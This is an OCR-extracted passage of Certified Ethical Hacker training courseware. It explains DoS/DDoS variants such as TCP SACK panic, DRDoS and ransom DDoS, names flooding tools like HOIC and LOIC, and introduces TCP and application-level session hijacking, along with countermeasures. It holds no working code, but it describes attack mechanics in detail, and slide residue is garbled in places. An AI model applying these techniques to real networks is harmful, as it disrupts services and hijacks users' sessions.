Ee Layer Attack eee Sesseesesesses>

Victim

Figure 10.19: Multi-vector attack

Module 10 Page 1454

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Peer-to-Peer Attack

CE H

@ Using peer-to-peer attacks, attackers instruct clients of peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's fake website @ Attackers exploit flaws found in the network using the DC++ (Direct Connect) protocol, which is used for sharingall types of files between instant messaging clients @

Using this

method,

attackers launch massive denial-of-service attacks and compromise websites

Peer-to-Peer Attack A peer-to-peer attack is a form of DDoS attack in which the attacker exploits a number of bugs in peer-to-peer servers to initiate a DDoS attack. Attackers exploit flaws found in networks that use the Direct Connect (DC++) protocol, which allows the exchange of files between instantmessaging clients. This kind of attack does not use botnets. Unlike a botnet-based attack, a peer-to-peer attack eliminates the need for attackers to communicate with the clients they subvert. Here, the attacker instructs clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and instead connect to the victim’s website. Consequently, several thousand computers may aggressively attempt to connect to a target website, causing a drop in the performance of the target website. It is easy to identify peer-to-peer attacks based on signatures. By using this method, attackers launch massive DoS attacks to compromise websites. Peer-to-peer DDoS attacks can be minimized by specifying ports for peer-to-peer communication. For example, specifying port 80 to disallow peer-to-peer communication minimizes the possibility of attacks on websites.

Module 10 Page 1455

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

User5.

Attack Traffic

User3. Attacker

User 1. Figure 10.20: Peer-to-peer attack

Module 10 Page 1456

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Permanent Denial-of-Service Attack and TCP SACK

C IE H

Pood bth

Panic Attack

Permanent Denial-of-Service Attack

TCP SACK Panic Attack

(@

Permanent DoS, also known as phlashing, refers to attacks that cause irreversible damage to system hardware

(@

|

Unlike other Dos attacks, it sabotages the system hardware,

|@_ This attack exploits an integer overflow vulnerability

|G

This attackis carried out using a method known as “bricking a

“@ Attackers send SACK packets in sequence to the target server by setting

requiring the victim to replace or reinstall the hardware

system”

|G _ Using this method, attackers send fraudulent hardware updates to the victims

In TCP SACK panicattack, attackers attemptto crash the target Linux machine by sending SACK packets with malformed maximum segment size (MSS) Buffer (SKB), which can lead to kernel panic

MSS to the lowest value (48 bytes)

|G The socket buffer exceeds the limit and triggers integer overflow causing akernel panic that leads to denial of service

IRC chats, tweets, posts, videos Attacker

‘Attacker gets access to vic

s computer

in Linux Socket

Linux Server

Buffer overflows cause kernel panic

Victim (Malicious code is executed)

Permanent Denial-of-Service Attack Permanent DoS (PDoS) attacks, also known as phlashing, purely target hardware and cause irreversible damage to the hardware. Unlike other types of DoS attacks, it sabotages the system hardware, requiring the victim to replace or reinstall the hardware. The PDoS attack exploits security flaws in a device to allow remote administration on the management interfaces of the victim’s hardware, such as printers, routers, and other networking devices.

This type of attack is quicker and more destructive than conventional DoS attacks. It works with a limited amount of resources, unlike a DDoS attack, in which attackers unleash a set of zombies onto a target. Attackers perform PDoS attacks by using a method known as the “pricking” of a system. In this method, the attacker sends emails, IRC chats, tweets, or videos with fraudulent content for hardware updates to the victim. The hardware updates are modified and corrupted with vulnerabilities or defective firmware. When the victim clicks on a link or pop-up window referring to the fraudulent hardware update, the victim installs it in their system. Consequently, the attacker attains complete control over the victim’s system. Sends email, IRC chats, tweets, posts, videos

ith fraudulent content for hardware updates

seen eeeeeeseeeeeeeeesauseaeeseseessaeeesssss>>

Attacker

Attacker gets access to victim’s computer

Victim (Malicious code is executed)

Figure 10.21: Permanent DoS attack

Module 10 Page 1457

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

TCP SACK Panic Attack TCP Selective Acknowledgment (SACK) panic attack is a remote attack vector in which attackers attempt to crash the target Linux machine by sending SACK packets with malformed maximum segment size (MSS). This attack exploits an integer overflow vulnerability in Linux Socket Buffer (SKB) that can lead to kernel panic. Generally, Linux systems use the TCP SACK method, where the sender is informed about the packets that are successfully acknowledged by the receiver. Therefore, the sender can retransmit only those packets that are not successfully acknowledged by the receiver. Here, Linux uses a linked-list data structure called socket buffer to store the data until it is acknowledged or received. The socket buffer can store a maximum of 17 segments. Then, the acknowledged packets are instantly deleted from the linked data structure. If buffer socket tries to store more than 17 segments, it can cause kernel panic. The TCP SACK panic attack leverages this vulnerability of the socket buffer. To achieve this, attackers send specially designed SACK packets in sequence to the target server by setting the MSS to the lowest value (48 bytes). The lowest MSS value increases the number of TCP segments that need to be retransmitted. This selective retransmission causes the socket buffer of the target server to exceed the limit of 17 segments. Thus, the socket buffer exceeds the limit and triggers integer overflow, causing a kernel panic that leads to DoS. As the vulnerability lies in the kernel stack, attackers can also perform this attack against containers and virtual machines. SACK

ket

Buffer

cectsavaveveseuereteny moeseeeavavavenesepe

overflows

SACK packet

cause kernel

Jan aeeeeenseaeceeeeeseneeeesensensenssesse Dy Attacker,

9

=]

2

fat)

Linux Server

panic

4

Legitimate Users

Figure 10.22: TCP SACK panic attack

Countermeasures =

Implement vulnerability patching

=

Implement a firewall rule to block requesting packets with the lowest MSS

Module 10 Page 1458

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Distributed Reflection Denial-of-Service (DRDoS) Attack

CE H

@ A distributed reflected denial-of-service attack (DRDOS), also known as a spoofed attack, involves theuse of multiple

intermediary and secondary machines that contribute to the actual DDoS attack against the target machine or application

@ Attackers launch this attack by sending requests to the intermediary hosts, which then redirect the requests to the secondary machines, which in turn reflect the attack traffic to the target Advantage © The primary target

seems to be directly attacked by the

secondary victim rather

t

than the actual attacker

@ Multiple intermediary

victim servers are used, which results in an

increase in attack bandwidth

__}

wy)

ie

‘g

.

Primary Target

a

Attacker

Intermediary Victims

Secondary Victims Copyright © by

Distributed Reflection Denial-of-Service (DRDoS) Attack A distributed reflection DoS (DRDoS) attack, also known as a “spoofed” attack, involves the use of multiple intermediary and secondary machines that contribute to a DDoS attack against a target machine vulnerability.

or

application.

A

DRDoS

attack

exploits

the

TCP

three-way

handshake

This attack involves an attacker machine, intermediary victims (zombies), secondary victims (reflectors), and a target machine. The attacker launches this attack by sending requests to the intermediary hosts, which in turn reflect the attack traffic to the target. The process of a DRDoS attack is as follows. First, the attacker commands the intermediary victims (zombies) to send a stream of packets (TCP SYN) with the primary target’s IP address as

the source IP address to other non-compromised machines (secondary victims or reflectors) in order to exhort them to establish a connection with the primary target. Consequently, the reflectors send a huge volume of traffic (SYN/ACK) to the primary target to establish a new connection with it because they believe the host requested it. The primary target discards the SYN/ACK packets received from the reflectors because they did not send the SYN packet. Meanwhile, the reflectors wait for the ACK response from the primary target. Assuming that

the packet was lost, the reflector machines resend SYN/ACK packets to the primary target to establish the connection, until a time-out occurs. In this manner, the target machine is flooded

with a heavy volume of traffic from the reflector machines. The combined bandwidth of these reflector machines overwhelms the target machine. A DRDOS attacker. primary multiple

attack is an intelligent attack because it is very difficult or even impossible to trace the Instead of the actual attacker, the secondary victims (reflectors) seem to attack the target directly. This attack is more effective than a typical DDoS attack because intermediary and secondary victims generate huge attack bandwidth.

Module 10 Page 1459

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

Primary Target

Intermediary Victims

Secondary Victims

Figure 10.23: Distributed reflection DoS (DRDoS) attack

=

Countermeasures o

Turn off the Character Generator method

o

Download the latest updates and patches for servers

Module 10 Page 1460

Protocol (CHARGEN)

service to stop this attack

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

DDoS Extortion/Ransom DDoS (RDDoS) Attack

* (oteredtoa¢ronsom DOs

g,

(RDDoS). Herein, attackers threaten the target organizations with DDoS attackand insist them to paya specified ransom amount

@

o oO

Attackers send an email witha

the victim with a warning that the originalattack canbe

launchedat any moment

may also include @ Ransomnote

short messages threatening the victim about exposed vulnerabilities, assets, or data followed by instructionsfor

SI



ransom note alongwith

payment option, deadline, etc. to

CE H

BOe BOB -o o

OOo

BOB

a

Launches sample DDoS attack ii

gil

au

oa

Target Crganiation’s

he

Targeted Organization

ransom payment

DDoS Extortion/Ransom DDoS (RDDoS) Attack The DDoS extortion attack is also referred to as ransom DDoS (RDDoS). Herein, attackers threaten the target organizations with an DDoS attack and insist them to pay a specified ransom amount. The attacker either sends a ransom note or initiates a sample DDoS attack using a botnet on specific resources of the organizations to make them believe that the attack is real. Consequently, an email with a ransom or extortion note with the payment option, deadline, etc. is delivered to the victim and warns that the original attack can be launched at any moment. The ransom note may also include short messages or a series of messages threatening the victim with vulnerabilities, exposed assets, or data followed by instructions for ransom payment through digital currency. Generally, attackers fake these attacks claiming that they have high-capacity DDoS capability tools that can cause potential damage to the organization’s business.

Module 10 Page 1461

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

DDoS attack

sn

b

‘Ez

10 i010 oo O00

Uses botnet :

Attacker +

Launches sample

Target Organization’s Assets

the

|

Targeted Organization

4

Sends ransom note/email Figure 10.24: DDoS extortion attack

Countermeasures

=

Implement effective DDoS defense tools

=

Immediately report to the law enforcement agencies and security teams after receiving a ransom note

=

Frequently evaluate assets for risk tolerance

=

Implement service

Module 10 Page 1462

mitigation

strategies

such

as BGP/

DNS

swing

and

always-on

protection

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

DoS/DDoS Attack Tools

CE H

High Orbit Ion Cannon (HOIC)

DoS/DDoS Attack Tools XOIC

(http://anonhacktivism. blogspot.com)

HOIC carries out a DDoS to

attack any IP address witha user selected port anda user selected protocol

@ HULK (https://github.com) © Metasploit (https://www.metasploit.com)

Low Orbit Ion Cannon (LOIC)

Tor’s Hammer (https://sourceforge.net)

LOIC can be used on a target site to flood the server with TCP packets, UDP packets, or HTTP requests with the intention ofdisrupting the service of a particular host

Slowloris (https://github.com) ® PyLoris (https://sourceforge.net) httex://eourceforge net

$s Reserved. Reproduction

DoS/DDoS Attack Tools =

High Orbit lon Cannon (HOIC)

Source: https://sourceforge.net HOIC is a network stress and DoS/DDoS attack application written in BASIC language. It is designed to attack up to 256 target URLs simultaneously. It sends HTTP POST and GET requests to a computer that uses lulz-inspired GUls. Its features are summarized as follows: o

High-speed multi-threaded HTTP flooding

o

Simultaneous flooding of up to 256 websites

o

Built-in scripting system to allow the deployment of “boosters,” which are scripts designed to thwart DDoS countermeasures and increase DoS output

©

Portability to Linux/Mac with a few bug fixes

o

Ability to select the number of threads in an ongoing attack

o

Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH

Module 10 Page 1463

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Denial-of-Service

Exam 312-50 Certified Ethical Hacker

[IEE H.0.1¢, | v2.1.003 | Truth is on the side of the oppressed

Concepts of denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks Cs

> Concept of botnets along with the botnet ecosystem

> Various types of DoS/DDoS attacks > Various DoS/DDoS attack tools > Adetailed DDoS case study, namely, the DDoS Attack on Microsoft Azure »

We concluded with a detailed discussion on various countermeasures that are to be

employed to prevent DoS/DDoS attacks along with various hardware and software DoS/DDoS protection tools

Q

Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform session hijackingto steal a valid session ID

Module Summary In this module, we discussed concepts related to denial-of-service (DoS) and distributed denialof-service (DDoS) attacks. We also discussed concepts related to botnets along with the botnet ecosystem. Moreover, we illustrated various DoS/DDoS attack tools and also discussed various types of DoS/DDoS attacks. Further, a detailed case study of

a DDoS attack on Microsoft Azure

was presented. We concluded with a detailed discussion on various countermeasures to prevent DoS/DDoS attacks, along with various hardware and software DoS/DDoS protection

tools. In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, perform session hijacking to steal a valid session ID.

Module 10 Page 1506

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

CiEH

EC-Council

Certified |) Ethical Hacker

MODULE 11 ——

SESSION HIJACKING ——

Wn menteyer 4



=

meme

ee

wre Hy a“

Be



nee

ete

arg

acces

Seu

&

tetas

ce

ll

ow auto pedaing: 10px 0, transtorm trateZ(0)

em

GRRE

oF

Ome te at

Ae WE ome



sweet “TT aMataennies

masherght 0px

emuntiocnageos «Amat giiemmoenie mag

ovetion Ndden,

eaten tie ee nt

_———-s

ee

eal

*

*

te

cova onaeeas,

eens: toom oni

onetersereeer+O"wet eamat coats renes height auto

CC passing 10080

transtorm transiatez(0)

) sualed js Boews BU pro 1 natin an"togs border-bottom 2px sod

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

© LO#01: Summarize Session Hijacking Concepts

o

LEARNING

© LO#02: Explain Application-Level Session Hijacking

OBJECTIVES

LO#04: Use Session Hijacking Tools LO#05: Explain Session Hijacking Countermeasures

© LO#03: Explain Network-Level Session Hijacking

Strictly Prohibited

Learning Objectives Session hijacking allows attackers to take over an active session by bypassing the authentication process. Thereafter, they can perform any action on the hijacked system. At the end of this module, you will be able to do the following: =

Describe session hijacking concepts

=

Perform application-level session hijacking

=

Perform network-level session hijacking

=

Use different session hijacking tools

=

Apply session hijacking countermeasures

Module 11 Page 1509

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

LO#01: Summarize Session Hijacking Concepts

Session Hijacking Concepts Familiarization with basic concepts related to session hijacking is important to attain a comprehensive understanding. This section explains what session hijacking is as well as the reasons why session hijacking succeeds. It also discusses the session hijacking process, packet analysis of a local session hijack, types of session hijacking, session hijacking in an Open Systems Interconnection (OSI) model, and differences between spoofing and hijacking.

Module 11 Page 1510

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

What is Session Hijacking? @

Session hijacking refers to an attack in which an attacker seizes control of a valid TCP communication

computers

} @

{

¢ iE H Credential Transmission

session between two

SessionID Prediction Session Desynchronization

| Start injecting packets to the target server

a mE | Take over the session

° | Break the connection to the victim’seprachire

=)

Monitor | Monitorthe flow of packets and predict the sequence number Sniff | Place yourself between the victim and the target (you must be able to sniff the network)

Figure 11.2: Session hijacking process

Module 11 Page 1515

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Session hijacking can be divided into three broad phases. Tracking the connection The attacker uses a network sniffer to track a victim and host or uses a tool such as Nmap to scan the network for a target with a TCP sequence that is easy to predict. After identifying a victim, the attacker captures the sequence and acknowledgment numbers of the victim because TCP checks these numbers. The attacker then uses these numbers to construct packets. Desynchronizing the connection A desynchronized state occurs when a connection between a target and host is established, or stable with no data transmission or the server’s sequence number is not equal to the client’s acknowledgment number, or vice versa. To desynchronize the connection between the target and host, the attacker must change the sequence number or acknowledgment number (SEQ/ACK) of the server. For this purpose, the attacker sends null data to the server; consequently, the server’s SEQ/ACK numbers advance, while the target machine does not register the increment. For example, before desynchronization, the attacker monitors the session without any interference, following which they send a large amount of null data to the server. These data change the ACK number on the server without affecting anything else, thereby desynchronizing the server and target.

Another approach is to send a reset flag to the server to break the connection on the server side. Ideally, this occurs in the early setup stage of the connection. The attacker’s goal is to break the connection on the server side and create a new connection with a different sequence number. The attacker waits for a SYN/ACK packet from the server to the host. On detecting a packet, the attacker immediately sends an RST packet and a SYN packet with identical parameters, such as a port number with a different sequence number, to the server. The server, on receiving the RST packet, closes the connection with the target and initiates another one based on the SYN packet but with a different sequence number on the same port. After opening a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this packet and sends an ACK packet to the server. Now, the server is in the established state. The aim is to keep the target conversant and ensure that it switches to the established state on receiving the first SYN/ACK packet from the server. Consequently, both the server and target are desynchronized but in an established state. An attacker can also use a FIN flag, but this will make the server respond with an ACK packet, thus revealing the attack through an ACK storm. The attack is revealed because of a flaw in this method of hijacking a TCP connection. While receiving an unacceptable packet, the host acknowledges it by sending the expected sequence number. This unacceptable packet generates an ACK packet, thereby creating an endless loop for every data packet. The mismatch in SEQ/ACK numbers results in excess network traffic

Module 11 Page 1516

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

with both the server and these packets carry no However, because TCP conversation between the An attacker can add target host. Without keeping their identity ensure that the server =

target attempting to verify the correct sequence. Because data, retransmission does not occur if the packet is lost. uses IP, the loss of a single packet ends the unwanted server and target.

a desynchronizing stage to the hijack sequence to deceive the desynchronizing, the attacker injects data into the server while hidden by spoofing an IP address. However, the attacker should responds to the target host as well.

Injecting the attacker's packet Once the attacker has interrupted the connection between the server and target, they can either inject data into the network or actively participate as the man in the middle, passing data from the target to the server and vice-versa while reading and injecting data at will.

Module 11 Page 1517

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Packet Analysis of a Local Session Hijack

¢ EH

SYN

User

.

ACK 1501

Note: Before the user

sends the next data packet, the attacker predicts the next

sequence number and ++} [Bf sends the data to the server; this leads to the ACK 1440 establishment of the

connection between the

ssc [Ip attacker and the server Copyright © by

Packet Analysis of a Local Session Hijack Session hijacking involves high-level attack vectors, which affect many systems. transmitting data by many systems that establish LAN or Internet connections. a connection between two systems and for the successful transmission of systems should perform a three-way handshake. Session hijacking involves the this three-way handshake method to take control over the session.

TCP is used for For establishing data, the two exploitation of

To conduct a session hijacking attack, the attacker performs three activities: =

Tracking of a session

=

Desynchronization of the session

=

Injection of commands during the session

By sniffing network traffic, an attacker can monitor or track a session. The next step in session hijacking is to desynchronize the session. It is easy to accomplish this attack if the attacker knows the next sequence number (NSN) used by the client. A session can be hijacked by using that sequence number before the client uses it. There are two possibilities to determine sequence numbers: one is to sniff the traffic, find an ACK packet, and then determine the NSN based on the ACK packet. The other is to transmit data with guessed sequence numbers, which is not a reliable method. If the attacker can access the network and sniff the TCP session, they can easily determine the sequence number. This type of session hijacking is called "local session hijacking.”

Module 11 Page 1518

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

The below figure shows the packet analysis of a local session hijack. SYN

DATA=128

ACK (Clt SEQ + DATA) 1329

& |Attacker

Figure 11.3: Packet analysis of a local session hijack

According to above figure, the next expected sequence number is 1420. If the attacker transmits that packet sequence number before the user does, they can desynchronize the connection between the user and server. If the attacker sent the data with the expected sequence number before the user could, the server would be synchronized with the attacker. This leads to the establishment of a connection between the attacker and server. Then, the server would drop the data sent by the user with the correct sequence number, believing it to be a resent packet. The user is unaware of the attacker’s action and may resend the data packet because the user does not receive an ACK for their TCP packet. However, the server would drop all the packets resent by the user. Thus, the local session hijacking attack is successfully completed.

Module 11 Page 1519

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Types of Session Hijacking Passive

Active

‘@

Ina

CE H

passive attack, an attacker hijacks a session but sits back, watches, and

records all the traffic in that session

‘@_Inan active attack, an attacker finds an active session and seizes control of it

Attacker

Victim

Types of Session Hijacking Session hijacking can be either active or passive, depending on the degree of involvement of the attacker. The essential difference between an active and passive hijack is that while an active hijack takes over an existing session, a passive hijack monitors an ongoing session. =

Passive Session Hijacking

In a passive attack, after hijacking a session, an attacker only observes and records all the traffic during the session. A passive attack uses sniffers on the network, allowing attackers to obtain information such as user IDs and passwords. The attacker can later use this information to log in as a valid user and enjoy the user’s privileges. Password sniffing is the simplest attack to obtain raw access to a network. Countering this attack involves methods that range from identification schemes (for example, one-time password systems such as S/KEY) to ticketing identification (for example, Kerberos). These techniques help in protecting data from sniffing attacks, but they cannot protect against active attacks if the data are unencrypted or do not carry a digital signature. =

Active Session Hijacking In an active attack, an attacker takes over an existing session either by breaking the connection on one side of the conversation or by actively participating. An example of an active attack is a man-in-the-middle (MITM) attack. To perform a successful MITM attack, the attacker must guess the sequence number before the target responds to the server. On most current networks, sequence-number prediction does not work, because operating-system (OS) vendors use random values for the initial sequence number, which makes it difficult to predict sequence numbers.

Module 11 Page 1520

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Attacker Figure 11.4: Attacker sniffing a victim’s traffic

Module 11 Page 1521

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Session Hijacking in OSI Model

Network-Level

Hijacking

Application-Level

Hijacking

|

‘@

CE H

Network-level hijacking can be defined as the interception of packets during the transmission between a client and

the server in a TCP or UDP session

‘@

Application-level hijacking refers to gaining control over the

HTTP’s user session by obtaining the session IDs

Copyright © by

Session Hijacking in OSI Model There are two levels of session hijacking in the OSI model: the network-level and applicationlevel. =

Network-Level Hijacking Network-level hijacking is the interception of packets during the transmission between a client and server in a TCP/User Datagram Protocol (UDP) session. A successful attack provides the attacker with crucial information, which can be further used to attack application-level sessions. Attackers most likely perform network-level hijacking because they do not need to modify the attack on a per-web-application basis. This attack focuses on the data flow of the protocol shared across all web applications.

=

Application-Level Hijacking Application-level hijacking involves gaining control over the Hypertext Transfer Protocol (HTTP) user session by obtaining the session IDs. At the application-level, the attacker gains control of an existing session and can create new unauthorized sessions by using stolen data. In general, both occur together, depending on the system being attacked.

Module 11 Page 1522

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Spoofing vs. Hijacking Spoofing Attack

Hijacking

@ Anattacker pretendsto be another user or

@ Session hijacking is the process of seizing control

‘@

‘@

machine (victim) to gain access

of an existing active session

The attacker does not seize control of an existing

active session; instead, he or she initiates a new

session using the victim's stolen credentials

James (victim)

Server

The attacker relies on the legitimate user to create

a connection and authenticate

S

James logs on to the

' james

(Victim)

Predicts t sequence and ki

Server

James’ connect

John (Attacker)

Spoofing vs. Hijacking In blind hijacking, an attacker predicts the sequence numbers that a victim host sends to create a connection that appears to originate from the host or a blind spoof. To understand blind hijacking, it is important to understand sequence-number prediction. TCP sequence numbers, which are unique per byte in a TCP session, provide flow control and data integrity. TCP segments provide the initial sequence number (ISN) as a part of each segment header. ISNs do not start at zero for each session. As part of the handshake process, each participant needs to state the ISN, and bytes are numbered sequentially from that point. Blind session hijacking relies on the attacker’s ability to predict or guess sequence numbers. An attacker is unable to spoof a trusted host on a different network and observe the reply packets because no route exists for the packets to return to the attacker’s IP address. Moreover, the attacker is unable to resort to Address Resolution Protocol (ARP) cache poisoning because routers do not broadcast ARP across the Internet. Because the attacker is unable to observe the replies,

he/she

must

anticipate

the

responses

from

the

victim

and

prevent

the

host

from

sending a TCP/RST packet to the victim. The attacker predicts sequence numbers that the remote host expects from the victim and then hijacks the communication. This method is useful when exploiting trust relationships between users and remote machines. In a spoofing attack, an attacker pretends to be another user or machine (victim) to gain access. Instead of taking over an existing active session, the attacker initiates a new session using the victim’s stolen credentials. Simple IP spoofing is easy to perform and is useful in various attack methods. To create new raw packets, the attacker must have root access on the machine. However, to establish a spoofed connection using this session hijacking technique, an attacker must know the sequence numbers used by a target machine. IP spoofing forces the attacker to

Module 11 Page 1523

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

forecast the NSN. When an attacker uses blind hijacking to send a command, they cannot view the response. In the case of IP spoofing without a session hijack, guessing the sequence number is unnecessary because no currently open session exists with that IP address. In a session hijack, the traffic returns to the attacker only if source routing is used. Source routing is a process that allows the sender to specify the route to be taken by an IP packet to the destination. The attacker performs source routing and then sniffs the traffic as it passes by the attacker. In session spoofing, captured authentication credentials are used to establish a session. In contrast, active hijacking eclipses a pre-existing session. As a result of this attack, a legitimate user may lose access or the normal functionality of their established Telnet session because an attacker hijacks the session and acts with the user’s privileges. Because most authentication mechanisms are enforced only at the initiation of a session, the attacker can gain access to a target machine without authentication while a session is in progress. Another method is to use source routed IP packets. This type of MITM attack allows an attacker to become a part of the target—host conversation by deceptively guiding IP packets to pass through their system. Session hijacking is the process of taking over an existing active session. An attacker relies on a legitimate user to make a connection and authenticate. Session hijacking is more difficult than IP address spoofing. In session hijacking, John (an attacker) would seek to insert himself into a session that James (a legitimate user) already had set up with \\Mail. John would wait until James establishes a session, displace James from the established session by some means, such as a DoS attack, and then pick up the session as though he were James. Subsequently, John would send a scripted set of packets to \\Mail and observe the responses. For this purpose, John needs to know the sequence number in use when he hijacked the session. To calculate the sequence number, he must know the ISN and the number of packets involved in the exchange

process.

Successful session hijacking is difficult without the use of known tools and is only possible when several factors are under the attacker’s control. Knowledge of the ISN is the least of John’s challenges. For instance, John needs a method to displace James from the active session as well as a method to know the exact status of James’s session at the moment that James is displaced. Both these tasks require John to have far more knowledge and control over the session than would normally be possible. However, IP address spoofing attacks can only be successful if an attacker uses IP addresses for authentication. They cannot perform IP address spoofing or session hijacking if per-packet integrity checking is executed. In the same manner, IP address spoofing or session hijacking is not possible if the session uses encryption methods such as Secure Sockets Layer (SSL) or Pointto-Point Tunneling Protocol (PPTP). Consequently, the attacker cannot participate in the key exchange.

Module 11 Page 1524

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

7

James

Server

(Victim)

John (Attacker) Figure 11.5: Spoofing attack

James logs on to the

ye

James ve

(Victim)

server with his credentials

Perrrerrrrrr iret titty

seeeeeeeeeeeeeeeses

D>

7

Predicts th sequence and ki

Server

James’ connect!

John (Attacker) Figure 11.6: Session hijacking

In summary, the hijacking of non-encrypted TCP communications requires encrypted session-oriented traffic, the ability to recognize TCP sequence the next sequence number (NSN) can be predicted, and the ability to access control (MAC) or IP address to receive communications that are

the presence of nonnumbers from which spoof a host’s media not destined for the

attacker’s host. If the attacker is on the local segment, they can sniff and predict the ISN + 1 number and route the traffic back to them by poisoning the ARP caches on the two legitimate hosts participating in the session.

Module 11 Page 1525

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

C/EH

LO#02: Explain Application-Level Session Hijacking

Copyright © by

Al Rights Reserved. Reproductionis Strict Prohibited

Application-Level Session Hijacking

CE H

@ Ina session hijacking attack, a session token is stolen or a valid session token is predicted to gain unauthorized access to the web server A session token can be compromised in various ways

[11 |

Session sniffing

Predictable session token

Man-in-the-middle attack

Man-in-the-browser attack

Cross-site scripting (XSS) attack

Cross-site request forgery attack

Session replay attack

Session fixation attack

CRIME attack

Forbidden attack

Session donation attack

PetitPotam hijacking

\exerved. Reproduction st

Application-Level Session Hijacking This section discusses application-level session hijacking and various methods to compromise the session token, such as session sniffing and the use of predictable session tokens. In application-level session hijacking, an attacker steals or predicts a valid session token to gain unauthorized access to a web server or create a new unauthorized session. Usually, networklevel and application-level session hijacking occur together because a successful network-level Module 11 Page 1526

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

session hijack provides an attacker with ample information to perform application-level session hijacking. Application-level session hijacking relies on HTTP sessions. An attacker implements various techniques such as stealing, guessing, and brute forcing to obtain a valid session ID, which helps in acquiring control over a valid user’s session while it is in

progress.

Stealing: Attackers use different techniques to steal session IDs. An attacker can steal the session key through physical access by, for example, acquiring the files containing session IDs or memory contents of either the user’s system or the server. The attacker can also use sniffing tools such as Wireshark or Riverbed Packet Analyzer Plus to sniff the traffic between the client and server to extract the session IDs from the packets. Guessing: An attacker attempts to guess the session IDs by observing session variables. In the case of session hijacking, the range of session ID values that can be guessed is limited. Thus, guessing techniques are effective only when servers use weak or flawed session-ID generation mechanisms.

Brute forcing: In the brute-force technique, an attacker obtains session IDs by attempting all possible permutations of session ID values until finding one that works. An attacker using a digital subscriber line (DSL) can generate up to 1,000 session IDs per second. This technique is most useful when the algorithm that produces session IDs is non-random.

Attacker
